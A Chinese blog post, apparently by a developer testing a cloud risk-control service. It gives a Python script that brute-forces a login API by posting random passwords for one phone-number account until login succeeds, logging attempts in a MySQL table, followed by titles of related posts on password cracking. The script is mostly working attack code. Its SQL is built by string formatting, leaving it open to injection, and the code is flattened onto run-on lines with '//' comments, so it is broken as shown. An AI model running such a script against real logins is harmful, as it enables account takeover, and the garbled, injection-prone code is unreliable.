使用Python暴力破解密码
由于业务需求,今天项目对接了百度云智能的风控系统,注册和登陆保护,想来测试一下性能,用python写了一个脚本,暴力破解密码,看看会不会触发风控
一、首先在本地新建了一个数据库,保存已经试错过的密码
CREATE TABLE `test`.`pwd` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`passwod` varchar(20) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL DEFAULT '',
`status` int(10) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`) USING BTREE,
UNIQUE INDEX `id`(`id`) USING BTREE,
INDEX `pwd`(`passwod`) USING BTREE
) ENGINE = MyISAM AUTO_INCREMENT = 1 CHARACTER SET = latin1 COLLATE = latin1_swedish_ci ROW_FORMAT = Dynamic;
不需要多,两个字段就好
给密码字段加个索引,方便数据量大的时候查询
二、写脚本
import requests
import random
import json
import pymysqlclass login:def randomStr():s = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"salt = ''//根据规则随机生成6-20位的字符串i = random.randint(6,20)for i in range(i):salt += random.choice(s)return salturl = "http://www.api.com/api/User/login"
pymysql.install_as_MySQLdb()
db = pymysql.connect("localhost", "root", "", "test")
cursor = db.cursor()
while(True):salt = login.randomStr()//查询数据库中有没有已经有这个新生成的密码,有的话,重新生成一个,没有就插入一条sql = "select * from pwd where passwod='%s'" % saltr = cursor.execute(sql)result = cursor.fetchone()if(result != None):salt = login.randomStr()data = {"account": "134********", "password": salt, "imei": ""}res = requests.post(url=url,json=data)insertSql = "insert into pwd(`passwod`) values('%s')" % (salt)print(insertSql)try:cursor.execute(insertSql)db.commit()except:db.rollback()json_str = json.loads(res.text)print("随机密码:",salt)print("Python 原始数据:", json_str)//登陆成功之后退出if(json_str.get('code') == 1):print("登陆成功")exit()print("JSON 对象:", json_str.get('data').get('msg'))
这样一个简单的脚本就写好了,自动跑去吧
使用Python暴力破解密码相关推荐
- python 暴力破解密码
import itertools tsPassWord = "13@dcN" #设置的测试密码 MaxLenPassword = 10 # 最大密码长度 wordList=&quo ...
- Python 暴力破解zip文件密码(相对简单的密码)
Python 暴力破解zip文件密码(相对简单的密码) 密码的使用范围很广,首先,我们要明确密码的作用,其次要明白密码的类型. 密码的作用是进行权限的限制,判断用户的合法性,(不 ...
- python暴力破解压缩包密码(python暴力破解zip压缩包)
python暴力破解压缩包密码 简介 简介: ZIP文件格式是一种数据压缩和文档储存的文件格式,原名Deflate,发明者为菲尔·卡茨(Phil Katz),他于1989年1月公布了该格式的资料.ZI ...
- Python:暴力破解密码 - 压缩包、web实战
简介:常规情况下,由于web自身的服务资源,带宽,吞吐率的原因,存在访问上线的情况,这和极端情况下本地直接即时访问,即时反馈的机制是完全不可等同的.另外暴力破解密码这种行为本身就是一个徘徊为灰色地带的 ...
- 使用Python暴力破解压缩文件密码
有一个加密的压缩文件,只记得密码前缀,但知道结尾是4位数字,想用Python暴力破解下. 刚开始想用Python标准库zipfile实现,先创建个密码为password的压缩文件test来测试: fr ...
- python 暴力破解 excel加密文件
python 暴力破解 excel加密文件 'wordlist.txt' 为待测试的密码列表 fdd ddd eeee 5e5e5 58d85d5e d2d4d5d 4d4d4d3 dfdf,d; l ...
- python暴力破解zip加密文件
目录 前言: 一.破解zip加密文件的思路: 1.准备一个加密的zip文件. 2.zipfile模块可以解压zip文件. 3.itertools.permutations实现全字符的全排列. 二.实操 ...
- 黑客开始利用云计算暴力破解密码
本文讲的是黑客开始利用云计算暴力破解密码[IT168 云计算频道]使用云计算服务来替代在公司里设立维护大量服务器,显然对节省企业的成本有利.不过现在看来从云计算服务中受惠最大的恐怕是黑客等群体,黑客们 ...
- 20220215-CTF-MISC-BUUCTF-小明的保险箱-binwalk分析-dd命令分离出RAR文件-ARCHPR暴力破解密码
CTF-MISC-BUUCTF-小明的保险箱 小明有一个保险箱,里面珍藏了小明的日记本,他记录了什么秘密呢?...告诉你,其实保险箱的密码四位纯数字密码.(答案格式:flag{答案},只需提交答案) ...
最新文章
- Truffle合约交互 - WEB端对以太坊数据的读写
- 【内含福利】七牛云线下专场活动免费报名
- Hive动态分区 参数配置及语法
- HALCON示例程序check_blister_mixed.hedv药品胶囊缺陷检测
- 小学音乐教学和计算机的融合,【多媒体技术论文】小学音乐多媒体教学融入策略问题(共5881字)...
- 几种Intent 的用法
- 如何在IOS平台上使用js直接调用OC方法(转)
- linux每日命令(20):find命令概览
- bat批处理 变量名写入文本,中文写入文本,延迟写入文本
- 显卡跑分软件怎么测试,硬件跑分 测试方法说明
- 网络工程师知识-盘点网工调试工具常用console线汇总
- 数据存储的未来,磁带是赢家?!
- Android的一个登陆注册页面
- linux mount iso文件系统,在linux系统上永久挂载ISO像镜文件
- 最好的聊天机器人平台,以建立一个聊天机器人
- 代码实现HelloMeituanCom转换为hello.meituan.com
- 我所理解的 iOS 并发编程
- dede数据库的四张核心表
- seetaface6 GPU版本windows编译
- 2022焊工(高级)培训试题及答案